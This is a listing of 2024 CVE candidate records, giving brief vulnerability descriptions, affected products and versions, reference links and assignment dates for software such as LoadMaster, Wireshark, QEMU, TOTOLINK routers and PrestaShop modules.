CVE 2024 2449 Candidate A cross-site request forgery vulnerability has been identified in LoadMaster. It is possible for a malicious actor, who has prior knowledge of the IP or hostname of a specific LoadMaster, to direct an authenticated LoadMaster administrator to a third-party site. In such a scenario, the CSRF payload hosted on the malicious site would execute HTTP transactions on behalf of the LoadMaster administrator. MISC:https://progress.com/loadmaster | URL:https://progress.com/loadmaster | MISC:https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449 | URL:https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449 Assigned (20240314)
CVE 2024 24488 Candidate An issue in Shenzen Tenda Technology CP3V2.0 V11.10.00.2311090948 allows a local attacker to obtain sensitive information via the password component. MISC:https://github.com/minj-ae/CVE-2024-24488 Assigned (20240125)
CVE 2024 24482 Candidate Aprktool before 2.9.3 on Windows allows ../ and /.. directory traversal. MISC:https://github.com/iBotPeaches/Apktool/security/advisories/GHSA-vgwr-4w3p-xmjv Assigned (20240125)
CVE 2024 2448 Candidate An OS command injection vulnerability has been identified in LoadMaster. An authenticated UI user with any permission settings may be able to inject commands into a UI component using a shell command resulting in OS command injection. MISC:https://progress.com/loadmaster | URL:https://progress.com/loadmaster | MISC:https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449 | URL:https://support.kemptechnologies.com/hc/en-us/articles/25119767150477-LoadMaster-Security-Vulnerabilities-CVE-2024-2448-and-CVE-2024-2449 Assigned (20240314)
CVE 2024 24479 Candidate ** DISPUTED ** A Buffer Overflow in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the wsutil/to_str.c, and format_fractional_part_nsecs components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected. FEDORA:FEDORA-2024-4115ab9959 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZT2BX7UARZVVWKITSZMHW7BHXGIKRSR2/ | MISC:https://gist.github.com/1047524396/c50ad17e9a1a18990043a7cd27814c78 | MISC:https://github.com/wireshark/wireshark/commit/c3720cff158c265dec2a0c6104b1d65954ae6bfd Assigned (20240125)
CVE 2024 24478 Candidate ** DISPUTED ** An issue in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the packet-bgp.c, dissect_bgp_open(tvbuff_t*tvb, proto_tree*tree, packet_info*pinfo), optlen components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected. MISC:https://gist.github.com/1047524396/e82c55147cd3cb62ef20cbdb0ec83694 | MISC:https://github.com/wireshark/wireshark/commit/80a4dc55f4d2fa33c2b36a99406500726d3faaef | MISC:https://gitlab.com/wireshark/wireshark/-/issues/19347 Assigned (20240125)
CVE 2024 24476 Candidate ** DISPUTED ** A buffer overflow in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the pan/addr_resolv.c, and ws_manuf_lookup_str(), size components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected. FEDORA:FEDORA-2024-4115ab9959 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZT2BX7UARZVVWKITSZMHW7BHXGIKRSR2/ | MISC:https://gist.github.com/1047524396/369ba0ccffe255cf8142208b6142be2b | MISC:https://github.com/wireshark/wireshark/commit/108217f4bb1afb8b25fc705c2722b3e328b1ad78 | MISC:https://gitlab.com/wireshark/wireshark/-/issues/19344 Assigned (20240125)
CVE 2024 24474 Candidate QEMU before 8.2.0 has an integer underflow, and resultant buffer overflow, via a TI command when an expected non-DMA transfer length is less than the length of the available FIFO data. This occurs in esp_do_nodma in hw/scsi/esp.c because of an underflow of async_len. MISC:https://gist.github.com/1047524396/5ce07b9d387095c276b1cd234ae5615e | MISC:https://github.com/qemu/qemu/commit/77668e4b9bca03a856c27ba899a2513ddf52bb52 | MISC:https://gitlab.com/qemu-project/qemu/-/issues/1810 Assigned (20240125)
CVE 2024 24470 Candidate Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the update_post.php component. MISC:https://github.com/tang-0717/cms/blob/main/1.md Assigned (20240125)
CVE 2024 24469 Candidate Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the delete_post .php. MISC:https://github.com/tang-0717/cms/blob/main/2.md Assigned (20240125)
CVE 2024 24468 Candidate Cross Site Request Forgery vulnerability in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via the add_customblock.php. MISC:https://github.com/tang-0717/cms/blob/main/3.md Assigned (20240125)
CVE 2024 2446 Candidate Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to limit the number of @-mentions processed per message, allowing an authenticated attacker to crash the client applications of other users via large, crafted messages. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240314)
CVE 2024 2445 Candidate Mattermost Jira plugin versions shipped with Mattermost versions 8.1.x before 8.1.10, 9.2.x before 9.2.6, 9.3.x before 9.3.2, and 9.4.x before 9.4.3 fail to escape user-controlled outputs when generating HTML pages, which allows an attacker to perform reflected cross-site scripting attacks against the users of the Mattermost server. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240314)
CVE 2024 2443 Candidate A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when configuring GeoJSON settings. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.13 and was fixed in versions 3.8.17, 3.9.12, 3.10.9, 3.11.7, and 3.12.1. This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.9 | URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.9 | MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.7 | URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.7 | MISC:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.1 | URL:https://docs.github.com/en/enterprise-server@3.12/admin/release-notes#3.12.1 | MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.17 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.17 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.12 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.12 Assigned (20240313)
CVE 2024 2442 Candidate Franklin Fueling System EVO 550 and EVO 5000 are vulnerable to a Path Traversal vulnerability that could allow an attacker to access sensitive files on the system. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-079-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-079-01 Assigned (20240313)
CVE 2024 24402 Candidate An issue in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted script to the /usr/local/nagios/bin/npcd component. MISC:https://www.nagios.com/changelog/ Assigned (20240125)
CVE 2024 24401 Candidate SQL Injection vulnerability in Nagios XI 2024R1.01 allows a remote attacker to execute arbitrary code via a crafted payload to the monitoringwizard.php component. MISC:https://www.nagios.com/changelog/ Assigned (20240125)
CVE 2024 24399 Candidate An arbitrary file upload vulnerability in LeptonCMS v7.0.0 allows authenticated attackers to execute arbitrary code via uploading a crafted PHP file. MISC:https://github.com/capture0x/leptoncms/blob/main/README.md Assigned (20240125)
CVE 2024 24398 Candidate Directory Traversal vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the fileName parameter of the Save function. MISC:http://stimulsoft.com | MISC:https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R | MISC:https://cves.at/posts/cve-2024-24398/writeup/ Assigned (20240125)
CVE 2024 24397 Candidate Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field. MISC:http://stimulsoft.com | MISC:https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R | MISC:https://cves.at/posts/cve-2024-24397/writeup/ Assigned (20240125)
CVE 2024 24396 Candidate Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the search bar component. MISC:http://stimulsoft.com | MISC:https://cloud-trustit.spp.at/s/Pi78FFazHamJQ5R | MISC:https://cves.at/posts/cve-2024-24396/writeup/ Assigned (20240125)
CVE 2024 24393 Candidate File Upload vulnerability index.php in Pichome v.1.1.01 allows a remote attacker to execute arbitrary code via crafted POST request. MISC:https://github.com/zyx0814/Pichome/issues/24 Assigned (20240125)
CVE 2024 24389 Candidate A cross-site scripting (XSS) vulnerability in XunRuiCMS up to v4.6.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Add Column Name parameter. MISC:https://j11zuc9f0h2.feishu.cn/docx/TXRmdIcH3ocn1WxuEQBcNPpjnLe Assigned (20240125)
CVE 2024 24388 Candidate Cross-site scripting (XSS) vulnerability in XunRuiCMS versions v4.6.2 and before, allows remote attackers to obtain sensitive information via crafted malicious requests to the background login. MISC:https://www.cnblogs.com/rxtycc/p/17948379 Assigned (20240125)
CVE 2024 24386 Candidate An issue in VitalPBX v.3.2.4-5 allows an attacker to execute arbitrary code via a crafted payload to the /var/lib/vitalpbx/scripts folder. MISC:https://erickduarte.notion.site/VitalPBX-3-2-4-5-ee402173241c493687aa22ec60160c67?pvs=4 | MISC:https://github.com/erick-duarte/CVE-2024-24386 Assigned (20240125)
CVE 2024 2438 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-47851. Reason: This candidate is a reservation duplicate of CVE-2023-47851. Notes: All CVE users should reference CVE-2023-47851 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. Assigned (20240313)
CVE 2024 24377 Candidate An issue in idocv v.14.1.3_20231228 allows a remote attacker to execute arbitrary code and obtain sensitive information via a crafted script. MISC:https://zhuabapa.top/2024/01/18/idocv_20231228_rce/#more Assigned (20240125)
CVE 2024 24375 Candidate SQL injection vulnerability in Jfinalcms v.5.0.0 allows a remote attacker to obtain sensitive information via /admin/admin name parameter. MISC:https://github.com/RiverGone/records/blob/main/JFinalcms-admin-admin-name.md Assigned (20240125)
CVE 2024 2437 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-41728. Reason: This candidate is a reservation duplicate of CVE-2023-41728. Notes: All CVE users should reference CVE-2023-41728 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. Assigned (20240313)
CVE 2024 24350 Candidate File Upload vulnerability in Software Publico e-Sic Livre v.2.0 and before allows a remote attacker to execute arbitrary code via the extension filtering component. MISC:https://gist.github.com/viniciuspinheiros/4e53b297fd6466cf12d01867ee1c9c33 | MISC:https://medium.com/@viniciuspinheiros/e-sic-livre-2-0-authenticated-file-upload-leads-to-remote-code-execution-rce-5937c9537258 Assigned (20240125)
CVE 2024 24337 Candidate CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components. MISC:https://nitipoom-jar.github.io/CVE-2024-24337/ Assigned (20240125)
CVE 2024 24336 Candidate A multiple Cross-site scripting (XSS) vulnerability in the '/members/moremember.pl', and ‘/members/members-home.pl’ endpoints within Koha Library Management System version 23.05.05 and earlier allows malicious staff users to carry out CSRF attacks, including unauthorized changes to usernames and passwords of users visiting the affected page, via the 'Circulation note' and ‘Patrons Restriction’ components. MISC:https://nitipoom-jar.github.io/CVE-2024-24336/ Assigned (20240125)
CVE 2024 24333 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the desc parameter in the setWiFiAclRules function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/15/TOTOlink%20A3300R%20setWiFiAclRules.md Assigned (20240125)
CVE 2024 24332 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the url parameter in the setUrlFilterRules function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/9/TOTOlink%20A3300R%20setUrlFilterRules.md Assigned (20240125)
CVE 2024 24331 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setWiFiScheduleCfg function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/13/TOTOlink%20A3300R%20setWiFiScheduleCfg.md Assigned (20240125)
CVE 2024 24330 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the port or enable parameter in the setRemoteCfg function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/14/TOTOlink%20A3300R%20setRemoteCfg.md Assigned (20240125)
CVE 2024 2433 Candidate An improper authorization vulnerability in Palo Alto Networks Panorama software enables an authenticated read-only administrator to upload files using the web interface and completely fill one of the disk partitions with those uploaded files, which prevents the ability to log into the web interface or to download PAN-OS, WildFire, and content images. This issue affects only the web interface of the management plane; the dataplane is unaffected. MISC:https://security.paloaltonetworks.com/CVE-2024-2433 | URL:https://security.paloaltonetworks.com/CVE-2024-2433 Assigned (20240313)
CVE 2024 24329 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/10/TOTOlink%20A3300R%20setPortForwardRules.md Assigned (20240125)
CVE 2024 24328 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setMacFilterRules function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/12/TOTOlink%20A3300R%20setMacFilterRules.md Assigned (20240125)
CVE 2024 24327 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the pppoePass parameter in the setIpv6Cfg function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/7/TOTOlink%20A3300R%20setIpv6Cfg.md Assigned (20240125)
CVE 2024 24326 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the arpEnable parameter in the setStaticDhcpRules function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/8/TOTOlink%20A3300R%20setStaticDhcpRules.md Assigned (20240125)
CVE 2024 24325 Candidate TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setParentalRules function. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/11/TOTOlink%20A3300R%20setParentalRules.md Assigned (20240125)
CVE 2024 24324 Candidate TOTOLINK A8000RU v7.1cu.643_B20200521 was discovered to contain a hardcoded password for root stored in /etc/shadow. MISC:https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A8000RU/TOTOlink%20A8000RU%20hard%20code.md Assigned (20240125)
CVE 2024 24323 Candidate SQL injection vulnerability in linlinjava litemall v.1.8.0 allows a remote attacker to obtain sensitive information via the nickname, consignee, orderSN, orderStatusArray parameters of the AdminOrdercontroller.java component. MISC:https://github.com/lousix/exp/blob/main/CVE-2024-24323/CVE-2024-24323.md Assigned (20240125)
CVE 2024 24321 Candidate An issue in Dlink DIR-816A2 v.1.10CNB05 allows a remote attacker to execute arbitrary code via the wizardstep4_ssid_2 parameter in the sub_42DA54 function. MISC:http://dir-816a2.com | MISC:https://github.com/dkjiayu/Vul/blob/main/DIR816A2-dir_setWanWifi.md | MISC:https://www.dlink.com/ | MISC:https://www.dlink.com/en/security-bulletin/ Assigned (20240125)
CVE 2024 2432 Candidate A privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition. MISC:https://security.paloaltonetworks.com/CVE-2024-2432 | URL:https://security.paloaltonetworks.com/CVE-2024-2432 Assigned (20240313)
CVE 2024 24311 Candidate Path Traversal vulnerability in Linea Grafica "Multilingual and Multistore Sitemap Pro - SEO" (lgsitemaps) module for PrestaShop before version 1.6.6, a guest can download personal information without restriction. MISC:https://security.friendsofpresta.org/modules/2024/02/06/lgsitemaps.html Assigned (20240125)
CVE 2024 24310 Candidate In the module "Generate barcode on invoice / delivery slip" (ecgeneratebarcode) from Ether Creation <= 1.2.0 for PrestaShop, a guest can perform SQL injection. MISC:https://addons.prestashop.com/en/preparation-shipping/24123-generate-barcode-on-invoice-delivery-slip.html | MISC:https://security.friendsofpresta.org/modules/2024/02/20/ecgeneratebarcode.html Assigned (20240125)
CVE 2024 2431 Candidate An issue in the Palo Alto Networks GlobalProtect app enables a non-privileged user to disable the GlobalProtect app in configurations that allow a user to disable GlobalProtect with a passcode. MISC:https://security.paloaltonetworks.com/CVE-2024-2431 | URL:https://security.paloaltonetworks.com/CVE-2024-2431 Assigned (20240313)
CVE 2024 24309 Candidate In the module "Survey TMA" (ecomiz_survey_tma) up to version 2.0.0 from Ecomiz for PrestaShop, a guest can download personal information without restriction. MISC:https://security.friendsofpresta.org/modules/2024/02/20/ecomiz_survey_tma.html | MISC:https://www.ecomiz.com/ Assigned (20240125)
CVE 2024 24308 Candidate SQL Injection vulnerability in Boostmyshop (boostmyshopagent) module for Prestashop versions 1.1.9 and before, allows remote attackers to escalate privileges and obtain sensitive information via changeOrderCarrier.php, relayPoint.php, and shippingConfirmation.php. MISC:https://security.friendsofpresta.org/modules/2024/02/08/boostmyshopagent.html Assigned (20240125)
CVE 2024 24307 Candidate Path Traversal vulnerability in Tunis Soft "Product Designer" (productdesigner) module for PrestaShop before version 1.178.36, allows a remote attacker to escalate privileges and obtain sensitive information via the ajaxProcessCropImage() method. MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-productdesigner-22.md Assigned (20240125)
CVE 2024 24304 Candidate In the module "Mailjet" (mailjet) from Mailjet for PrestaShop before versions 3.5.1, a guest can download technical information without restriction. MISC:https://github.com/mailjet/prestashop-mailjet-plugin-apiv3/releases/tag/v3.5.1 | MISC:https://security.friendsofpresta.org/modules/2024/02/06/mailjet.html Assigned (20240125)
CVE 2024 24303 Candidate SQL Injection vulnerability in HiPresta "Gift Wrapping Pro" (hiadvancedgiftwrapping) module for PrestaShop before version 1.4.1, allows remote attackers to escalate privileges and obtain sensitive information via the HiAdvancedGiftWrappingGiftWrappingModuleFrontController::addGiftWrappingCartValue() method. MISC:https://security.friendsofpresta.org/modules/2024/02/06/hiadvancedgiftwrapping.html Assigned (20240125)
CVE 2024 24302 Candidate An issue was discovered in Tunis Soft "Product Designer" (productdesigner) module for PrestaShop before version 1.178.36, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via the postProcess() method. MISC:https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-productdesigner-502.md Assigned (20240125)
CVE 2024 24301 Candidate Command Injection vulnerability discovered in 4ipnet EAP-767 device v3.42.00 within the web interface of the device allows attackers with valid credentials to inject arbitrary shell commands to be executed by the device with root privileges. MISC:https://github.com/yckuo-sdc/PoC Assigned (20240125)
CVE 2024 24300 Candidate 4ipnet EAP-767 v3.42.00 is vulnerable to Incorrect Access Control. The device uses the same set of credentials, regardless of how many times a user logs in, the content of the cookie remains unchanged. MISC:https://github.com/yckuo-sdc/PoC Assigned (20240125)
CVE 2024 24291 Candidate An issue in the component /member/index/login of yzmcms v7.0 allows attackers to direct users to malicious sites via a crafted URL. MISC:https://gitee.com/wgd0ay/wgd0ay/issues/I8WSD1 Assigned (20240125)
CVE 2024 24278 Candidate An issue in Teamwire Windows desktop client v.2.0.1 through v.2.4.0 allows a remote attacker to obtain sensitive information via a crafted payload to the message function. MISC:https://research.hisolutions.com/2020/08/web-vulnerabilities-are-coming-to-the-desktop-again-rces-and-other-vulnerabilities-in-teamwire/ Assigned (20240125)
CVE 2024 24276 Candidate Cross Site Scripting (XSS) vulnerability in Teamwire Windows desktop client v.2.0.1 through v.2.4.0 allows a remote attacker to obtain sensitive information via a crafted payload to the chat name, message preview, username and group name components. MISC:https://research.hisolutions.com/2020/08/web-vulnerabilities-are-coming-to-the-desktop-again-rces-and-other-vulnerabilities-in-teamwire/ Assigned (20240125)
CVE 2024 24275 Candidate Cross Site Scripting vulnerability in Teamwire Windows desktop client v.2.0.1 through v.2.4.0 allows a remote attacker to obtain sensitive information via a crafted payload to the global search function. MISC:https://research.hisolutions.com/2020/08/web-vulnerabilities-are-coming-to-the-desktop-again-rces-and-other-vulnerabilities-in-teamwire/ Assigned (20240125)
CVE 2024 24272 Candidate An issue in iTop DualSafe Password Manager & Digital Vault before 1.4.24 allows a local attacker to obtain sensitive information via leaked credentials as plaintext in a log file that can be accessed by the local user without knowledge of the master secret. MISC:https://research.hisolutions.com/2024/03/cve-2024-24272-dualsafe-password-manager-leaks-credentials/ Assigned (20240125)
CVE 2024 2427 Candidate A denial-of-service vulnerability exists in the Rockwell Automation PowerFlex® 527 due to improper traffic throttling in the device. If multiple data packets are sent to the device repeatedly the device will crash and require a manual restart to recover. MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html | URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html Assigned (20240313)
CVE 2024 24267 Candidate gpac v2.2.1 was discovered to contain a memory leak via the gfio_blob variable in the gf_fileio_from_blob function. MISC:https://github.com/yinluming13579/gpac_defects/blob/main/gpac_3.md Assigned (20240125)
CVE 2024 24266 Candidate gpac v2.2.1 was discovered to contain a Use-After-Free (UAF) vulnerability via the dasher_configure_pid function at /src/filters/dasher.c. MISC:https://github.com/yinluming13579/gpac_defects/blob/main/gpac_2.md Assigned (20240125)
CVE 2024 24265 Candidate gpac v2.2.1 was discovered to contain a memory leak via the dst_props variable in the gf_filter_pid_merge_properties_internal function. MISC:https://github.com/yinluming13579/gpac_defects/blob/main/gpac_1.md Assigned (20240125)
CVE 2024 24263 Candidate Lotos WebServer v0.1.1 was discovered to contain a Use-After-Free (UAF) vulnerability via the response_append_status_line function at /lotos/src/response.c. MISC:https://github.com/LuMingYinDetect/lotos_detects/blob/main/lotos_detect_1.md Assigned (20240125)
CVE 2024 24262 Candidate media-server v1.0.0 was discovered to contain a Use-After-Free (UAF) vulnerability via the sip_uac_stop_timer function at /uac/sip-uac-transaction.c. MISC:https://github.com/LuMingYinDetect/media-server_detect/blob/main/media_server_detect_1.md Assigned (20240125)
CVE 2024 24260 Candidate media-server v1.0.0 was discovered to contain a Use-After-Free (UAF) vulnerability via the sip_subscribe_remove function at /uac/sip-uac-subscribe.c. MISC:https://github.com/yinluming13579/media-server_defects/blob/main/media-server_1.md Assigned (20240125)
CVE 2024 2426 Candidate A denial-of-service vulnerability exists in the Rockwell Automation PowerFlex® 527 due to improper input validation in the device. If exploited, a disruption in the CIP communication will occur and a manual restart will be required by the user to recover it. MISC:https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html | URL:https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html Assigned (20240313)
CVE 2024 24259 Candidate freeglut through 3.4.0 was discovered to contain a memory leak via the menuEntry variable in the glutAddMenuEntry function. FEDORA:FEDORA-2024-0356803680 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6IBAWX3HMMZVAWJZ3U6VOAYYOYJCN3IS/ | FEDORA:FEDORA-2024-b69a4d75a1 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T43DAHPIWMGN54E4I6ABLHNYHZSTX7H5/ | MISC:https://github.com/freeglut/freeglut/pull/155 | MISC:https://github.com/yinluming13579/mupdf_defects/blob/main/mupdf_detect_2.md Assigned (20240125)
CVE 2024 24258 Candidate freeglut 3.4.0 was discovered to contain a memory leak via the menuEntry variable in the glutAddSubMenu function. FEDORA:FEDORA-2024-0356803680 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6IBAWX3HMMZVAWJZ3U6VOAYYOYJCN3IS/ | FEDORA:FEDORA-2024-b69a4d75a1 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T43DAHPIWMGN54E4I6ABLHNYHZSTX7H5/ | MISC:https://github.com/freeglut/freeglut/pull/155 | MISC:https://github.com/yinluming13579/mupdf_defects/blob/main/mupdf_detect_1.md Assigned (20240125)
CVE 2024 24256 Candidate SQL Injection vulnerability in Yonyou space-time enterprise information integration platform v.9.0 and before allows an attacker to obtain sensitive information via the gwbhAIM parameter in the saveMove.jsp in the hr_position directory. MISC:https://github.com/l8l1/killl.github.io/blob/main/3.md Assigned (20240125)
CVE 2024 24255 Candidate A Race Condition discovered in geofence.cpp and mission_feasibility_checker.cpp in PX4 Autopilot 1.14 and earlier allows attackers to send drones on unintended missions. MISC:https://github.com/Drone-Lab/PX4-Autopilot/blob/report-the-faliure-of-precheck/report-the-faliure-of-precheck.md Assigned (20240125)
CVE 2024 24254 Candidate PX4 Autopilot 1.14 and earlier, due to the lack of synchronization mechanism for loading geofence data, has a Race Condition vulnerability in the geofence.cpp and mission_feasibility_checker.cpp. This will result in the drone uploading overlapping geofences and mission routes. MISC:https://github.com/Drone-Lab/PX4-Autopilot/blob/report-can-not-pause-vulnerability/Multi-Threaded%20Race%20Condition%20bug%20found%20in%20PX4%20cause%20drone%20can%20not%20PAUSE.md | MISC:https://github.com/PX4/PX4-Autopilot Assigned (20240125)
CVE 2024 2425 Candidate A denial-of-service vulnerability exists in the Rockwell Automation PowerFlex® 527 due to improper input validation in the device. If exploited, the web server will crash and need a manual restart to recover it. MISC:https://https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html | URL:https://https://www.rockwellautomation.com/en-us/support/advisory.SD1664.html Assigned (20240313)
CVE 2024 24246 Candidate Heap Buffer Overflow vulnerability in qpdf 11.9.0 allows attackers to crash the application via the std::__shared_count() function at /bits/shared_ptr_base.h. FEDORA:FEDORA-2024-7d55be81bd | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3N6TULMEYVCLXO47Y5W4VWCJMSB72CB/ | FEDORA:FEDORA-2024-8762164e47 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4WLK6ICPJUMOJNHZQWXAA5MPXG5JHZZL/ | FEDORA:FEDORA-2024-daa7df59d6 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FX3D3YCNS6CQL3774OFUROLP3EM25ILC/ | MISC:https://github.com/qpdf/qpdf/issues/1123 Assigned (20240125)
CVE 2024 24230 Candidate Komm.One CMS 10.4.2.14 has a Server-Side Template Injection (SSTI) vulnerability via the Velocity template engine. It allows remote attackers to execute arbitrary code via a URL that specifies java.lang.Runtime in conjunction with getRuntime().exec followed by an OS command. MISC:https://blog.munz4u.de/posts/2023/11/cve-2023-xxxxx-rce-via-ssti-in-komm.one-cms-10.4.2.14/ Assigned (20240125)
CVE 2024 24216 Candidate Zentao v18.0 to v18.10 was discovered to contain a remote code execution (RCE) vulnerability via the checkConnection method of /app/zentao/module/repo/model.php. MISC:https://github.com/easysoft/zentaopms/issues/133 | MISC:https://github.com/l3s10n/ZenTaoPMS_RCE Assigned (20240125)
CVE 2024 24215 Candidate An issue in the component /cgi-bin/GetJsonValue.cgi of Cellinx NVT Web Server 5.0.0.014 allows attackers to leak configuration information via a crafted POST request. MISC:https://github.com/940198871/Vulnerability-details/blob/main/CVE-2024-24215 | MISC:https://reference3.example.com//1.222.228.4/, | MISC:https://reference4.example.com Assigned (20240125)
CVE 2024 24213 Candidate ** DISPUTED ** Supabase PostgreSQL v15.1 was discovered to contain a SQL injection vulnerability via the component /pg_meta/default/query. NOTE: the vendor's position is that this is an intended feature; also, it exists in the Supabase dashboard product, not the Supabase PostgreSQL product. Specifically, /pg_meta/default/query is for SQL queries that are entered in an intended UI by an authorized user. Nothing is injected. MISC:https://app.flows.sh:8443/project/default, | MISC:https://github.com/940198871/Vulnerability-details/blob/main/CVE-2024-24213 | MISC:https://postfixadmin.ballardini.com.ar:8443/project/default/logs/explorer. | MISC:https://reference1.example.com/project/default/logs/explorer, | MISC:https://supabase.com/docs/guides/database/overview#the-sql-editor Assigned (20240125)
CVE 2024 24202 Candidate An arbitrary file upload vulnerability in /upgrade/control.php of ZenTao Community Edition v18.10, ZenTao Biz v8.10, and ZenTao Max v4.10 allows attackers to execute arbitrary code via uploading a crafted .txt file. MISC:https://clammy-blizzard-8ef.notion.site/Zentao-PMS-Authorized-Remote-Code-Execution-Vulnerability-1077a870c92848e18fe0c139c4fc2176 Assigned (20240125)
CVE 2024 24189 Candidate Jsish v3.5.0 (commit 42c694c) was discovered to contain a use-after-free via the SplitChar at ./src/jsiUtils.c. MISC:https://github.com/pcmacdon/jsish/issues/101 Assigned (20240125)
CVE 2024 24188 Candidate Jsish v3.5.0 was discovered to contain a heap-buffer-overflow in ./src/jsiUtils.c. MISC:https://github.com/pcmacdon/jsish/issues/100 Assigned (20240125)
